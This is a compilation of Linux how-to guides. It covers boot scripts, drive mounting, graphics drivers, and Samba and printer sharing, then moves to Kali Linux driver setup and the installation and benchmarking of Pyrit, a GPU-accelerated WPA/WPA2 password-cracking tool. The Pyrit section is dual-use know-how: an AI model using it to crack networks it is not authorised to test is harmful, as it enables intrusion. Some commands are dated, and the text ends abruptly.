The Linux command line lives inside a shell. There are several shells, each with a unique set of commands; the most common (and default) Linux shell is BASH. We need to declare this at the top of our script if we wish it to be interpreted by that shell. Therefore, the above commands plus the shell declaration make the following script:

#!/bin/bash
cd driver_directory
insmod driver.ko
ifconfig eth0

We can also make it shorter:

#!/bin/bash
insmod /home/roger/driver_directory/driver.ko
ifconfig eth0

Now, we have a script. Or rather a text file that contains the relevant commands. We need to make it into an executable file. First, we need to save the file. Let’s call it network_script. To make the script executable:

chmod +x network_script
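As a quick sanity check of the chmod step, here is the full write-chmod-run cycle on a trivial stand-in script (the echo line stands in for the insmod and ifconfig commands):

```shell
#!/bin/sh
# Write a trivial stand-in for network_script.
cat > /tmp/network_script <<'EOF'
#!/bin/sh
echo "driver loaded"
EOF

chmod +x /tmp/network_script   # the step described above
/tmp/network_script            # now it runs like any other program
```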

Now we have a real script. We need to place it in the /etc/init.d directory so that it will be run during bootup.

cp network_script /etc/init.d/

And finally, we need to update the system, so it will take our script into consideration.

update-rc.d network_script defaults

After you reboot, you will realize that your driver loads automatically and that your network card is configured! Alternatively, it is possible that the make install of the driver will place it in the default directory:

/lib/modules/<KERNEL VERSION>/kernel/drivers/net/driver.ko

Or you could place the driver in this directory by yourself. This way, you will be able to avoid the step of writing the script. However, my method, even if not the most elegant one, has one advantage: Drivers that you have manually compiled and placed into the default directories will be lost every time you update the kernel. This means you will have to reinstall them again after every such update. My method un-elegantly escapes this problem.

Mounting a drive

If you run a dual-boot system, it is entirely possible that you have installed your Linux before you have formatted all the Windows drives. This means that some of these drives might not be mounted – or accessible – when you’re booted in Linux. Alternatively, you might have formatted the drives, but you have resized and relettered and renamed the partitions and they are no longer recognized by Linux. Furthermore, you just might be unlucky and your Linux refuses to see the drives despite your best efforts. Finally, you might be able to see them, but you cannot write to the NTFS drives and this irks you so. Compared to the above tasks, mounting drives is a simple job.

To be able to do this correctly, you need to know how your drives are ordered and what they are called, both in Windows and Linux. This requires that you be able to correlate between Windows partitions (E:\, G:\, K:\ etc.) and Linux partitions (hda1, hda4, hdb2 etc.).

First, make sure you know the order of your partitions in Windows. Then, when booted in Linux, list the Partition Tables:

fdisk -l

The above command will display all the available partitions on your system. In this example, you see only the Linux partitions present, but there might be other (Windows) partitions.

Linux commands - fdisk

For the sake of this exercise, let’s assume that Linux partitions are hda4-6, while Windows partitions are hda1-3.


  • hda1 will be Windows C:\ drive.
  • hda2 will be Windows F:\ drive – also called Data.
  • hda3 will be Windows G:\ drive – also called Games.
  • hda4 will be Linux swap / Solaris.
  • hda5 will be Linux (your /root).
  • hda6 will be Linux (your /home).

Now, before you mount a drive, you need to create a mount point. This is most conveniently done by assigning a directory within the /media directory. For example:

mkdir /media/data

The name data is arbitrary, but it can help relate the mounted drive to its Windows designation. Now, we need to mount the drive that corresponds to data. In our case, this is hda2:

mount /dev/hda2 /media/data

There are several ways of mounting the drive. By default, NTFS partitions are mounted as read-only, although write access can also be enabled. FAT32 partitions are writable by default.

Like before, a manual mount only holds for the current session; after a reboot, the change is lost. Therefore, we need to add the mounting of the relevant partitions to the boot chain. The configuration file that holds this crucial information is called fstab and is located under /etc (/etc/fstab).

Therefore, in order to mount the NTFS drive (Windows F:\ drive called data) as read-only we need to:

  • Create a directory called data within /media.
  • Backup fstab.
  • Add a new line to the fstab file – one that will mount the NTFS drive hda2 (Windows F:\data) as read-only.

mkdir /media/data
cp /etc/fstab /etc/fstab.bak
gedit /etc/fstab

After opening the file in the text editor, we need to add the mount command. NTFS read-only:

/dev/hda2 /media/data ntfs nls=utf8,umask=0222 0 0
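For reference, an fstab line has six whitespace-separated fields; the entry above breaks down as:

```
# <device>  <mount point>  <type>  <options>            <dump>  <fsck pass>
/dev/hda2   /media/data    ntfs    nls=utf8,umask=0222  0       0
```

The umask=0222 option masks out the write permission bits for everyone, which is what makes the mount effectively read-only.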

The necessary commands, as well as procedures are well-documented in the Unofficial Ubuntu 6.10 (Edgy Eft) Starter Guide. Here, you can see the sample fstab file inside Kate text editor, for Kubuntu Linux.

Linux commands - fstab

Other options

Alternatively, if you have partitions formatted with FAT32 file system or you wish to be able to write to NTFS partitions from within Linux, you can use the following commands:

FAT32 read/write:

/dev/hda2 /media/data vfat iocharset=utf8,umask=000 0 0

NTFS read/write – requires installation of software that can write to NTFS drives.

apt-get install ntfs-3g
/dev/hda1 /media/data ntfs-3g defaults,locale=en_US.utf8 0 0

An exercise: Let’s assume we wish to be able to write to NTFS partition C, read-only NTFS partition F and use FAT32 partition G. In that case, the list of commands that we need to execute is:

apt-get install ntfs-3g

mkdir /media/windows
mkdir /media/data
mkdir /media/games

cp /etc/fstab /etc/fstab.bak
gedit /etc/fstab

Then add the following lines to /etc/fstab:


/dev/hda1 /media/windows ntfs-3g defaults,locale=en_US.utf8 0 0
/dev/hda2 /media/data ntfs nls=utf8,umask=0222 0 0
/dev/hda3 /media/games vfat iocharset=utf8,umask=000 0 0

Installation of graphic card drivers

Please note that commands used in this subsection are for Nvidia drivers ONLY – I have several computers, ALL of which have Nvidia graphic cards – but some of the solutions presented work for both Nvidia and ATI cards.

Although I have already discussed the installation of graphic card drivers in my Installing SUSE Linux and Installing Kubuntu Linux articles, I think a bit of extra guidance will not hurt anyone.

Basically, you can install the graphic card drivers using a Package Manager or via the command line. For most people, the first method should work flawlessly. The first method is embodied in these two commands – the download of the required package and the installation of the driver:

apt-get install nvidia-glx
nvidia-glx-config enable

Some people might prefer to install the drivers manually, with the X Windows stopped. To do this, you literally need to stop the desktop from running.

/etc/init.d/gdm stop
/etc/init.d/kdm stop
/etc/init.d/xdm stop

The desktop should vanish and be replaced with a command line. You will probably need to login. It is possible that you will only see a black screen and no command prompt. Do not be alarmed! Linux operating system usually has 7 virtual consoles. The first six consoles provide a text terminal with a login prompt to a UNIX shell. The 7th virtual console is used to start the X Windows.

In other words, it may occur that by stopping the X Windows you will have simply switched off the graphics AND remained in the 7th virtual console, therefore having no command line to work with. All you need to do is switch to one of the text consoles by pressing Alt + F1-6 on the keyboard. Now, you need to install the driver you downloaded, for example:

sh NVIDIA-Linux-*.run


After the installation is complete, you should simply restart the X Windows.

/etc/init.d/gdm start
/etc/init.d/kdm start
/etc/init.d/xdm start

If you see an Nvidia splash logo, it means the driver has been successfully installed. Reboot your machine just to make sure. This is where you might encounter a problem.

Instead of the Nvidia logo, you will see an error message indicating that the X Server has been disabled and that you need to manually edit the settings in the xorg.conf file before being able to proceed to the desktop. Now, there are many possible reasons for such an error and trying to provide a general solution is impossible.

However, I have found the following argument to hold true for many cases: if you have set up your Linux distribution using the GUI installer, you will probably have used the default configuration, and the generic kernel will have been installed. In this case, the built-in Nvidia driver (nv) can sometimes interfere with the installation. There are two methods for solving this problem.

Method 1: Alberto Milone’s envy package

Envy is a command-line application that will download the latest drivers for your card, clean up old drivers and install the new ones. Instructions for the usage can be found below the download links.

Method 2: Do it yourself

First, download the required driver. Then, execute the following commands:

The offending built-in driver needs to be disabled.

gedit /etc/default/linux-restricted-modules-common

Change the last line to DISABLED_MODULES="nv". This will prevent the built-in driver from loading and interfering with your own installed driver.

Linux commands - linux-restricted

Now, you should remove all conflicting files from your system:

apt-get install linux-headers-`uname -r` build-essential gcc gcc-3.4 xserver-xorg-dev

apt-get --purge remove nvidia-glx nvidia-settings nvidia-kernel-common

rm /etc/init.d/nvidia-*

After the offenders are removed, you should install the drivers from the command line:

/etc/init.d/gdm stop
sh NVIDIA-Linux-*.run
nvidia-xconfig --add-argb-glx-visuals
/etc/init.d/gdm start

Again, you should see the Nvidia splash logo. Reboot just to make sure there are no more surprises. This should get you up and running with the latest graphic card driver.

Network sharing

If you have more than one computer, you are probably sharing resources among them. There is no reason why you should not continue doing this if one of the machines is running a Linux distribution. Sharing can be accomplished in many ways. Perhaps the simplest is using the Samba server. First, install Samba:

apt-get install samba

After the Samba server is installed, you will need to edit a few options in the configuration file to allow sharing privileges.

cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
gedit /etc/samba/smb.conf

In the configuration file, you will need to setup a number of parameters:

  • workgroup = workgroup_name – the name of the Workgroup for your LAN (e.g. HOME)
  • netbios name = netbios_name – without spaces; computer alias by which you will be able to call it across the network
  • security = user

After saving the configuration file, you will have to restart the Samba server:

/etc/init.d/samba restart

Now, select a folder that you wish to share.

Linux commands - samba share 1

If you have ticked the option Writable, you will be able to modify the contents of this folder. Finally, to be able to connect to this share from Windows, you will have to create a Samba user:

smbpasswd -a 'name'

Under 'name' you should specify an existing UNIX user (e.g. roger). Do not forget the apostrophes! You will be asked to create a password. And finally, restart the Samba server again for the changes to take effect. Now, the sharing itself. Very simple.

Windows > Linux

Start > Run > \\IP_address OR \\netbios_name

When asked for username and password, provide the Samba user name, e.g. roger and the relevant password. And that’s it. Browse to the shared folder. If the shared folder is writable, you will be able to modify the contents.

Linux > Windows

Press Alt + F2. This will bring up the Run Command window. In the Command line, specify the IP address or the name of the computer that you wish to connect. You can see an example below:

Linux commands - samba sharing 2

And that’s it. Easy peasy lemon squeasy!

Printer sharing

Well now, folder and file sharing is really easy. What about printers? Again, it is very simple. If you have a printer installed on a Windows machine, accessing it from a Linux machine will be easy. The rougher side of the coin is accessing a printer installed on a Linux machine from a Windows machine. First, you will have to allow your printer to be shared. Back up and then edit the Common UNIX Printing System configuration file.

cp /etc/cups/cupsd.conf /etc/cups/cupsd.conf.bak
gedit /etc/cups/cupsd.conf

In the file, search for the entry #Listen (or Listen localhost:631) and change it so CUPS listens for network connections:

Listen *:631
Listen /var/run/cups/cups.sock

CUPS listens on the port 631. If you use a static IP address for the Linux machine, you can specify only that IP. Otherwise, you might need to use a wildcard. Of course, you should be aware that an open port means a wee less security than before, so keep that in mind. After saving the changes, you will have to restart CUPS:

/etc/init.d/cupsys restart

Now that the printer is available, you will have to add it for the Windows machine.

Start > Settings > Printers and Faxes
File > Add Printer

… A network printer, or a printer attached to another computer …
… Connect to a printer on the Internet or on a home or office network …

When prompted for the driver, either select from a list or install it from a disk (like CD). And that’s it! You can now print from a Windows machine on a printer connected to a Linux machine.

Tip: If you are using a Lexmark printer, you will probably not be able to find the right Linux drivers for your printer. Worry not! Using generic drivers for Hewlett Packard printers will work remarkably well.

Other useful commands

Here’s a tiny sampling of some other useful tools that you might want to know. Be aware that the commands are presented in a generic way only. A variety of options (switches) can be used in conjunction with many of the commands to make their usage far more complex and effective.

Switching between runlevels

init 0-6


telinit 0-6

Backing up the X Windows configuration file

cp /etc/X11/xorg.conf /etc/X11/xorg.conf.bak

Sometimes, you may need or want to configure the X Windows manually:

dpkg-reconfigure xserver-xorg

Display system environment information

You can use the cat (concatenate) command, which will print the contents of the files into the terminal. To display the CPU parameters:

cat /proc/cpuinfo

To display the memory parameters:

cat /proc/meminfo

To find the version of your kernel and the GCC compiler:

cat /proc/version

Furthermore, to find out the version of your kernel:

uname -r

Listing information about files and folders

This command is the equivalent of the DOS dir command:

ls

To display hidden files as well (those starting with a dot):

ls -a
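A quick demonstration of the difference, using a throwaway directory:

```shell
#!/bin/sh
# Make a scratch directory with one visible and one hidden file.
mkdir -p /tmp/ls_demo
cd /tmp/ls_demo
touch visible .hidden

ls      # lists only: visible
ls -a   # also lists .hidden (plus the . and .. entries)
```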

Kill a process

Sometimes, you may start an application … only it does not really start. So you try again. But this time, your distro informs you that the process is already running. This can also happen in Windows. Sometimes, processes remain open and need to be killed. Before you can kill a process, you need to know its ID. The command below will list all running processes:

ps -elf

Then, kill the offending process by its ID.

kill PID

Alternatively, you can kill a process by its name. The below command will terminate all processes with the corresponding name (or names).

killall process_name
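The whole find-then-kill cycle can be tried safely on a throwaway process; the sleep 300 below stands in for the stuck application:

```shell
#!/bin/sh
# Start a long-running process in the background and remember its PID.
sleep 300 &
pid=$!

ps -elf | grep "[s]leep 300"   # it shows up in the process listing
kill "$pid"                    # terminate it by its process ID
wait "$pid" 2>/dev/null        # collect the exit status

ps -p "$pid" > /dev/null 2>&1 || echo "process gone"
```

The [s] in the grep pattern is a small trick that stops grep from matching its own command line in the process list.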


Well, that’s it, for now. Hopefully you have learned something.

If you have had problems with your software installations, compilation from sources, drivers, partitions, and sharing, this article may have helped you overcome some of the problems. Personally, the above tips cover about 90% of tasks that a normal user would have to confront as a part of his/her daily usage. Isn’t Linux so much fun? Well, have fun tweaking.

Install AMD ATI Proprietary FGLRX Driver + AMD APP SDK + Pyrit + CAL++ + Helpful ATIconfig FGLRX Commands

Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6

The Kali dev team added a new version of the AMD ATI proprietary fglrx driver, which is now available via the Kali Linux repositories. That means this guide is less complicated and everything should work out of the box, instead of messing about with the Debian Jessie repository.

Step by step guide to install proprietary fglrx driver in Kali Linux

Following instructions were tested on 64-bit Kali Linux 1.0.6 running Kernel version 3.12.6:

lsb_release -a


No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux Kali Linux 1.0.6
Release:    Kali Linux 1.0.6
Codename:   n/a

Step 1 (add official Kali Linux Repositories)

Check your /etc/apt/sources.list. If it’s anything different to the following, you need to fix it. You can follow this guide to add official Kali Linux Repositories if you’re not too sure on how to do it. For the sake of clarity I will keep things simple here.

leafpad /etc/apt/sources.list

Remove or comment out existing lines and add the following:

## Kali Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
## Kali Source repositories
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Step 2 (update with apt-get)

Now we need to update and make sure we get the latest list from Kali Linux official repositories. So perform an apt-get update.

apt-get update

Step 3 (install Linux headers and recommended software)

Now that we have the correct repositories, we can install the following recommended packages. The most important part is to install the correct headers.

apt-get install firmware-linux-nonfree 
apt-get install amd-opencl-icd 
apt-get install linux-headers-$(uname -r)
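The $(uname -r) substitution is what ties the headers package to the running kernel; you can see exactly what it expands to:

```shell
#!/bin/sh
# uname -r prints the running kernel's release string; the shell substitutes
# it into the package name, e.g. linux-headers-3.12-kali1-amd64.
kernel=$(uname -r)
echo "linux-headers-$kernel"
```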

NOTE: You should be able to get all these from Kali Linux repositories as added/updated from Step 1 above. When this guide was written, all these were available in the Kali Repositories.

Step 4 (install fglrx drivers and control)

Almost done, just install fglrx drivers and control. The best part is that it’s all you need to do. Debian Jessie fixed the issues with fglrx and latest driver, so once you install these drivers, everything just works.

apt-get install fglrx-atieventsd fglrx-driver fglrx-control fglrx-modules-dkms -y

NOTE: At this point, you will see a bunch of popups (a rarity in Linux): aptitude asks to update some libraries (OpenCL and GLX) and to restart services such as networking. I have chosen YES to all of them. My installation of Kali is still working and I am yet to find a problem. Your experience might be different.

Once the installation is finished, we need to test if it all went well.

Step 5 (testing your installation and generate xorg.conf file)

Now that our installation went through without an error, we need to test the fglrx driver. You can test it using the following two commands:

fglrxinfo
fgl_glxgears
Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 - Final - 11 - blackMORE Ops

If everything worked well, you can generate the xorg.conf file using the following command:

aticonfig --initial -f

The xorg.conf file will be located in the /etc/X11 folder.

Install AMD ATI proprietary fglrx driver in Kali Linux 1.0.6 - Final - 2 - blackMORE Ops

Step 6 (update grub.cfg file and reboot)

Almost there. AMD cards need the following parameter passed into grub.cfg during boot. Let's do that. Edit the grub.cfg file:

leafpad /boot/grub/grub.cfg

You will see something like this:

### BEGIN /etc/grub.d/10_linux ###
menuentry 'Debian GNU/Linux, with Linux 3.12-kali1-amd64' --class debian --class gnu-linux --class gnu --class os {
    insmod gzio
    insmod part_msdos
    insmod ext2
    set root='(hd0,msdos5)'
    search --no-floppy --fs-uuid --set=root 129deb3c-0edc-473b-b8e8-507f0f2dc3f9
    echo    'Loading Linux 3.12-kali1-amd64 ...'
    linux    /boot/vmlinuz-3.12-kali1-amd64 root=UUID=129deb3c-0edc-473b-b8e8-507f0f2dc3f9 ro initrd=/install/gtk/initrd.gz quiet
    echo    'Loading initial ramdisk ...'
    initrd    /boot/initrd.img-3.12-kali1-amd64

Add radeon.modeset=0 at the end of the following line:

linux    /boot/vmlinuz-3.12-kali1-amd64 root=UUID=129deb3c-0edc-473b-b8e8-507f0f2dc3f9 ro initrd=/install/gtk/initrd.gz quiet

So the line above becomes this:

linux    /boot/vmlinuz-3.12-kali1-amd64 root=UUID=129deb3c-0edc-473b-b8e8-507f0f2dc3f9 ro initrd=/install/gtk/initrd.gz quiet radeon.modeset=0

Note: the UUID 129deb3c-0edc-473b-b8e8-507f0f2dc3f9 will be different for every PC. Use your own here.

grub.cfg - Install AMD ATI proprietary driver (fglrx) in Kali Linux 1.0.6 running Kernel version 3.12.6 - blackMORE Ops

Save and exit. Then reboot.


Once you reboot, you should be able to log in to the GUI and enjoy your AMD ATI proprietary driver (fglrx) in Kali Linux 1.0.6 running Kernel version 3.12.6.

Step 7 (run ATI Catalyst Control Center)

Run ATI Catalyst Control Center from Applications Menu > System Tools > Preferences > ATI Catalyst Control Center.

You should be able to launch amdcccle and make changes as required.


There's more that you can do using aticonfig. You can change fan speed, set up multiple monitors, or directly check GPU temperatures. I have shown a compilation of useful aticonfig commands at the end of this post. However, I found that some commands were removed from this version of aticonfig (AMD does it every time they release a new driver), but most of the commands work. So feel free to check and report back.

How To Install AMD APP SDK In Kali Linux?

Check FGLRX Installation

First check if fglrx module is installed:

lsmod | grep fglrx

You should get a response similar to:

fglrx 2635205 82
button 12945 1 fglrx

Installing AMD APP SDK

What is AMD APP Technology?

AMD APP technology is a set of advanced hardware and software technologies that enable AMD graphics processing cores (GPU), working in concert with the system’s x86 cores (CPU), to execute heterogeneously to accelerate many applications beyond just graphics. This enables better balanced platforms capable of running demanding computing tasks faster than ever, and sets software developers on the path to optimize for AMD Accelerated Processing Units (APUs).

What is the AMD APP Software Development Kit?

The AMD APP Software Development Kit (SDK) is a complete development platform created by AMD to allow you to quickly and easily develop applications accelerated by AMD APP technology. The SDK provides samples, documentation, and other materials to quickly get you started leveraging accelerated compute using OpenCL™, Bolt, or C++ AMP in your C/C++ application, or Aparapi for your Java application.

What is OpenCL™?

OpenCL™ is the first truly open and royalty-free programming standard for general-purpose computations on heterogeneous systems. OpenCL™ allows programmers to preserve their expensive source code investment and easily target both multi-core CPUs and the latest APUs and discrete GPUs, such as those from AMD. Developed in an open standards committee with representatives from major industry vendors, OpenCL™ gives users what they have been demanding: a cross-vendor, non-proprietary solution for accelerating their applications on their CPU and GPU cores.

Download AMD APP SDK x2.7

Download AMD APP SDK v2.7 from:

AMD Download Archive

Install SDK

Install the SDK:

mkdir amdappsdk
cp AMD-APP-SDK-v2.7-lnx64.tar amdappsdk/
cd amdappsdk
tar -xvf AMD-APP-SDK-v2.7-lnx64.tar

Edit /root/.bashrc and add the following lines to the end of the file (adjust the paths to match the directory the tar archive actually created):

export AMDAPPSDKROOT=/root/amdappsdk/AMD-APP-SDK-v2.7-RC-lnx64
export AMDAPPSDKSAMPLESROOT=/root/amdappsdk/AMD-APP-SDK-v2.7-RC-lnx64/samples
export LD_LIBRARY_PATH=$AMDAPPSDKROOT/lib/x86_64:$LD_LIBRARY_PATH
export ATISTREAMSDKROOT=$AMDAPPSDKROOT
Save and quit, then issue the following command:

source ~/.bashrc

How To Install Pyrit In Kali Linux?

Check FGLRX Installation

First check if fglrx module is installed:

lsmod | grep fglrx

You should get a response similar to:

fglrx 2635205 82
button 12945 1 fglrx

Check AMD APP SDK Installation

Check if AMD APP SDK is installed. If not installed, follow this guide to install it.

Check CAL++ Installation

Check if CAL++ is installed. If not installed, follow this guide to install it.

Why Pyrit?

Pyrit allows you to create massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSK authentication phase in a space-time tradeoff. Exploiting the computational power of many-core and other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock, it is currently by far the most powerful attack against one of the world's most used security protocols.

Install Pyrit in Kali

Install prerequisites

apt-get install libpcap-dev

Remove existing installation of pyrit

apt-get remove --purge pyrit

If you are not using a clean install of Kali (not recommended), you may need to issue the following command:

rm -r /usr/local/lib/python2.7/dist-packages/cpyrit/

Download pyrit

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn

Install Pyrit

cd pyrit_svn/pyrit/
./setup.py build install

Install CAL++ plugin

cd ../cpyrit_calpp/


Edit setup.py and modify/replace the following:

find VERSION = '0.4.0-dev' and replace with VERSION = '0.4.1-dev'

find CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include')) and replace with CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))

Save and quit, then issue the following command:

./setup.py build install

There will be several warnings, but hopefully no errors and everything will be installed.

Test cpyrit

List available core

pyrit list_cores


The following cores seem available...

#1: 'CAL++ Device #1 'AMD GPU DEVICE''
#2: 'CPU-Core (SSE2)'
#3: 'CPU-Core (SSE2)'
#4: 'CPU-Core (SSE2)'

Benchmark Pyrit

pyrit benchmark


Computed 7548.89 PMKs/s total.
#1: 'CAL++ Device #1 'AMD GPU DEVICE'': 5599.3 PMKs/s (RTT 1.4)
#2: 'CPU-Core (SSE2)': 685.6 PMKs/s (RTT 3.0)
#3: 'CPU-Core (SSE2)': 688.5 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 691.9 PMKs/s (RTT 3.0)

How to install CAL++ in Kali Linux?

Check FGLRX Installation

First check if fglrx module is installed:

lsmod | grep fglrx

You should get a response similar to:

fglrx 2635205 82
button 12945 1 fglrx

If not installed follow this guide to install it.

Check AMD APP SDK Installation

Check if AMD APP SDK is installed. If not installed follow this guide to install it.

Installing CAL++

CAL++ is a simple library that allows writing ATI CAL kernels directly in C++. The syntax is very similar to OpenCL. A C++ wrapper for CAL is also included.

This project was registered on SourceForge.net on Feb 19, 2010.

Install prerequisites:

apt-get install cmake libboost-all-dev

Download CAL++

Download calpp 0.90 from: SourceForge CAL++ Website

Install CAL++

tar -xvf calpp-0.90.tar.gz
cd calpp-0.90/

Edit CMakeLists.txt:

Find the lines starting with FIND_LIBRARY and FIND_PATH and replace them with these (they assume the ATISTREAMSDKROOT environment variable points at your AMD APP SDK installation):

FIND_LIBRARY( LIB_ATICALCL aticalcl PATHS "$ENV{ATISTREAMSDKROOT}/lib/x86_64" )
FIND_LIBRARY( LIB_ATICALRT aticalrt PATHS "$ENV{ATISTREAMSDKROOT}/lib/x86_64" )
FIND_PATH( LIB_ATICAL_INCLUDE NAMES cal.h calcl.h PATHS "$ENV{ATISTREAMSDKROOT}/include/CAL" )

Save and quit.

Make and Install CAL++

Issue the following commands:

cmake .
make install

Helpful ATIconfig FGLRX Commands

ATI Proprietary Linux Driver (ATIconfig fglrx) Features

The ATI Proprietary Linux driver (ATIconfig fglrx) provides TV Output support for ATI graphics cards that support TV out. The ATI Proprietary Linux (ATIconfig fglrx) driver also allows for the following monitor arrangements:

  1. Single Head Mode (single display)
  2. Clone Mode (same content on both screens)
  3. Mirror Mode (same content on both screens, with identical display resolution and refresh rates)
  4. Big Desktop (one desktop stretched across two screens)
  5. Dual Head (separate instances of X running on each screen)

ATI Config Linux Edition - blackMORE Ops

ATI Workstation Product Support

The ATI Proprietary Linux driver is designed to support the following ATI Workstation products:

  • FireGL™ V7350
  • FireGL™ V3300
  • FireGL™ X1-128
  • FireGL™ V7300
  • FireGL™ V3200
  • FireGL™ X1-256p
  • FireGL™ V7200
  • FireGL™ V3100
  • FireGL™ 8800
  • FireGL™ V7100
  • FireGL™ X3-256
  • FireGL™ 8700
  • FireGL™ V5200
  • FireGL™ X3
  • FireMV™ 2200 (Single card configuration)
  • FireGL™ V5100
  • FireGL™ X2-256
  • Mobility™ FireGL™ V5000
  • FireGL™ V5000
  • FireGL™ Z1-128
  • Mobility™ FireGL™ 9100
  • FireGL™ V3400
  • FireGL™ T2-128
  • Mobility™ FireGL™ T2

ATI Mobility™ Product Support

The ATI Proprietary Linux driver is designed to support the following ATI Mobility™ products:

  • Mobility™ Radeon® X1800
  • Mobility™ Radeon® 9800
  • Mobility™ Radeon® X1600
  • Mobility™ Radeon® 9600
  • Mobility™ Radeon® X1400
  • Mobility™ Radeon® 9550
  • Mobility™ Radeon® X1300
  • Mobility™ Radeon® 9500
  • Mobility™ Radeon® X800
  • Mobility™ Radeon® 9000
  • Mobility™ Radeon® X700
  • Mobility™ Radeon® 9200
  • Mobility™ Radeon® X600
  • Radeon® Xpress 200M series
  • Mobility™ Radeon® X300

ATI Integrated Product Support

The ATI Proprietary Linux driver is designed to support the following ATI Integrated products:

  • Radeon® Xpress 200 series
  • Radeon® 9100 IGP
  • Radeon® 9200 IGP
  • Mobility™ Radeon® 9000 IGP series
  • Mobility™ Radeon® 9100 IGP series

Caution: This software driver provides 2D support only for the ATI Radeon® 9100 IGP and ATI Radeon® 9100 PRO IGP.

ATI Desktop Product Family Support

The ATI Proprietary Linux driver is designed to support the following ATI desktop products:

  • Radeon® X1900 series
  • Radeon® 9800 series
  • Radeon® X1800 series
  • Radeon® 9600 series
  • Radeon® X1600 series
  • Radeon® 9200 series
  • Radeon® X1300 series
  • Radeon® 9000 series
  • Radeon® X850 series
  • Radeon® 9700 series
  • Radeon® X800 series
  • Radeon® 9550 series
  • Radeon® X700 series
  • Radeon® 9500 series
  • Radeon® X600 series
  • Radeon® 9100 series
  • Radeon® X300/X550 series
  • Radeon® 8500 series

Just make sure your product is listed here; otherwise the following commands are not supported.

Helpful ATIconfig commands

Initial setup (creates device section using fglrx)

 aticonfig --initial

Enable Video acceleration (Xv Overlay)

     aticonfig --overlay-type=Xv

Force fglrx to use kernel’s AGP driver instead of own implementation

(only use when internal agpgart doesn’t work)

    aticonfig --internal-agp=off

Note: Newer fglrx driver versions do not include an internal AGPGART so the kernel agpgart is used no matter what.

Use extended desktop with two monitors (dual-head and big desktop)

    aticonfig --initial=dual-head --screen-layout=right

This command will generate a dual head configuration file with the second screen located to the right of the first screen.

Setup big Desktop to Horizontal and Set Overlay on the Secondary Display

    aticonfig --dtop=horizontal --overlay-on=1

This command will set up big desktop to horizontal and set overlay on the secondary display.

If the black borders don’t go away, try this:

 aticonfig --query-monitor # to see monitors
 aticonfig --query-dispattrib=tmds2 #to see supported values
 aticonfig --set-dispattrib=tmds2,sizeX:1920 # to set X resolution
 aticonfig --set-dispattrib=tmds2,sizeY:1080 # to set Y resolution
 aticonfig --set-dispattrib=tmds2,positionX:0 # to set X position to 0
 aticonfig --set-dispattrib=tmds2,positionY:0 # to set Y position to 0
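The four --set-dispattrib calls above differ only in the attribute, so a small dry-run loop can generate them for review before you execute anything. In this sketch, tmds2 and 1920x1080 are example values; it only prints the commands, it does not run aticonfig.

```shell
# Dry run: build the four aticonfig commands for a given display and resolution.
DISP=tmds2; W=1920; H=1080
cmds=$(for attr in "sizeX:$W" "sizeY:$H" "positionX:0" "positionY:0"; do
  echo "aticonfig --set-dispattrib=$DISP,$attr"
done)
echo "$cmds"
```

Once the printed commands look right for your monitor, paste them into the terminal (or pipe the loop through `sh`).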

 Print information about power states.

    aticonfig --list-powerstates

Or, for us lazy folk, the shorter version is

   aticonfig --lsp

Set a power state to the lowest (battery friendly)

    aticonfig --set-powerstate=1

Note: check out available power states using aticonfig --list-powerstates
Note: this option does not work when an external monitor is connected

Print information about connected and enabled monitors

    aticonfig --query-monitor

How to enable two monitors on the fly

Assume you have two monitors already setup correctly
This example enables laptop internal monitor (lvds) and external monitor (crt1)

    aticonfig --enable-monitor=lvds,crt1 --effective=now

Note: aticonfig --enable-monitor=STRING,STRING where STRING can be one of the following, separated by commas: none, crt1, crt2, lvds, tv, tmds1, tmds2, auto.

Only 2 displays can be enabled at the same time. Any displays that are not on the list will be disabled.

Note: check out connected and enabled monitors using aticonfig --query-monitor

Turn off the second monitor on the fly and start to use only laptop internal monitor (lvds)

    aticonfig --enable-monitor=lvds --effective=now

Swap monitors on the fly when using big desktop mode

    aticonfig --swap-monitor --effective=now

Note: This only works for big desktop setup. This will swap the contents on the two monitors.

Get temperature:

   aticonfig --odgt

Get Fan speed:

   aticonfig --pplib-cmd "get fanspeed 0"

Replace 0 with the FAN number. i.e. 0, 1. etc.

Set Fan Speed:

   aticonfig --pplib-cmd "set fanspeed 0 40"

Where 0 is the fan number and 40 is the percent of speed you want it to run.

ATIConfigHelp Page

Install Proprietary NVIDIA Driver + kernel Module CUDA and Pyrit on Kali Linux

Install Proprietary NVIDIA Driver On Kali Linux – NVIDIA Accelerated Linux Graphics Driver

This guide explains how to install the proprietary “NVIDIA Accelerated Linux Graphics Driver”, or NVIDIA driver, on a Kali Linux system. If you are using Kali Linux and have an NVIDIA graphics card, then most likely you are using the open source NVIDIA driver nouveau. You can check with the lsmod | grep nouveau command. The nouveau driver works quite well, but if you want to use 3D acceleration or GPU based applications (such as CUDA and GPU pass-through) then you need to install the proprietary NVIDIA driver. The proprietary “NVIDIA Accelerated Linux Graphics Driver” provides optimized hardware acceleration of OpenGL applications via a direct-rendering X server. It is a binary-only Xorg driver requiring a Linux kernel module for its use. The first step is to fully update your Kali Linux system and make sure you have the kernel headers installed.

Previously you had to download the NVIDIA driver (CUDA) manually and edit the grub.cfg file to make everything work. Because this will be a long guide, I had to divide it into two parts:

You use the first guide to install the NVIDIA driver. If you want GPU acceleration (cudahashcat, GPU pass-through etc.), keep reading and follow the second guide to complete your installation. I’ve included as much detail as I can, including troubleshooting steps and checks, but I would like to hear your part of the story, so leave a comment with your findings and issues.

The new NVIDIA Driver

